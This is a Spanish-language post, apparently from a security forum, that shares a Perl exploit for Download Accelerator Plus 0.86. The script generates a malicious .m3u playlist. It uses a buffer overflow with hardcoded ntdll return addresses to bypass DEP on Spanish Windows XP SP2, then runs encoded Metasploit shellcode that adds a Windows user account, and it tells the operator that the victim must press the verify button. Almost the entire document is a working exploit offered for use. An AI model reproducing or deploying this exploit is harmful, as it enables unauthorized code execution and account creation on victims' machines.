Download Accelerator Plus(DAP), + DEP (Data Execution Prevention)

Ahi os dejo el exploit para que veais como poder desactivar esa proteccion tan maja que trae el windows xp sp2(activada por defecto para pocos procesos como explorer y desactivada para todo lo demas) y el windows 2003(activada para todo por defecto).

Link de descarga del tutorial

PD:Decir que funciona aunque DEP este desactivado tambien

#!/usr/bin/perl
################################################################################
#####################################
#
#
#Exploit por: Trancek
#Email:trancek@yashira.org
#
################################################################################
######################################
use Cwd;

print "Download Accelerator Plus (DAP) 0.86 .m3u Exploit\n\n";


$localhost = "http://localhost/";
$junk = "\x90" x 14115; #Hasta el Ret
$moval1 = "\x80\x20\x96\x7C"; #mov al,1 --> ntdll.dll(xp sp2 spanish)
$padding1 = "\x90" x 4; #NOP
$especialret = "\x94\x11\x91\x7C"; #mov ebp,esp(+codigo hasta ret) --> ntdll.dll(xp sp2 spanish)
$padding2 = "\x90" x 8; #NOP
$ret = "\xED\x1E\x95\x7C"; #jmp esp,win xp sp2(spanish)
$cpmal1 = "\xF8\xD3\x92\x7C"; #cmp al,1 --> ntdll.dll(xp sp2 spanish)
$nopeando = "\x90" x 20; #NOP


# win32_adduser - PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x33\x4b\x58\x4e\x57".
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58".
"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54".
"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43".
"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43".
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x4d\x46".
"\x46\x46\x50\x42\x45\x56\x4a\x47\x45\x46\x42\x52\x4f\x52\x43\x36".
"\x42\x32\x50\x46\x45\x46\x46\x57\x42\x52\x45\x47\x43\x37\x45\x36".
"\x44\x37\x42\x32\x46\x37\x45\x36\x43\x47\x46\x37\x42\x42\x46\x37".
"\x45\x36\x43\x37\x46\x37\x42\x52\x4f\x52\x41\x44\x46\x54\x46\x44".
"\x42\x52\x48\x42\x48\x32\x42\x32\x50\x36\x45\x56\x46\x57\x42\x42".
"\x4e\x36\x4f\x36\x43\x56\x41\x36\x4e\x56\x47\x46\x44\x37\x4f\x36".
"\x45\x37\x42\x37\x42\x42\x41\x34\x46\x46\x4d\x56\x49\x56\x50\x46".
"\x49\x56\x43\x57\x46\x37\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37".
"\x43\x57\x42\x52\x46\x47\x45\x56\x43\x37\x46\x47\x42\x32\x4f\x52".
"\x41\x34\x46\x34\x46\x34\x42\x30\x5a";


open(m3u, ">./vulnerable.m3u");
print m3u "$localhost";
print m3u "$junk";
print m3u "$moval1";
print m3u "$padding1";
print m3u "$especialret";
print m3u "$padding2";
print m3u "$ret";
print m3u "$cpmal1";
print m3u "$nopeando";
print m3u "$shellcode";

print "Instrucciones: El usuario tiene que pulsar el boton verificar. \n";
print "Con este exploit puede saltarse el DEP de Windows XP SP2\n\n";
print "Archivo creado\n";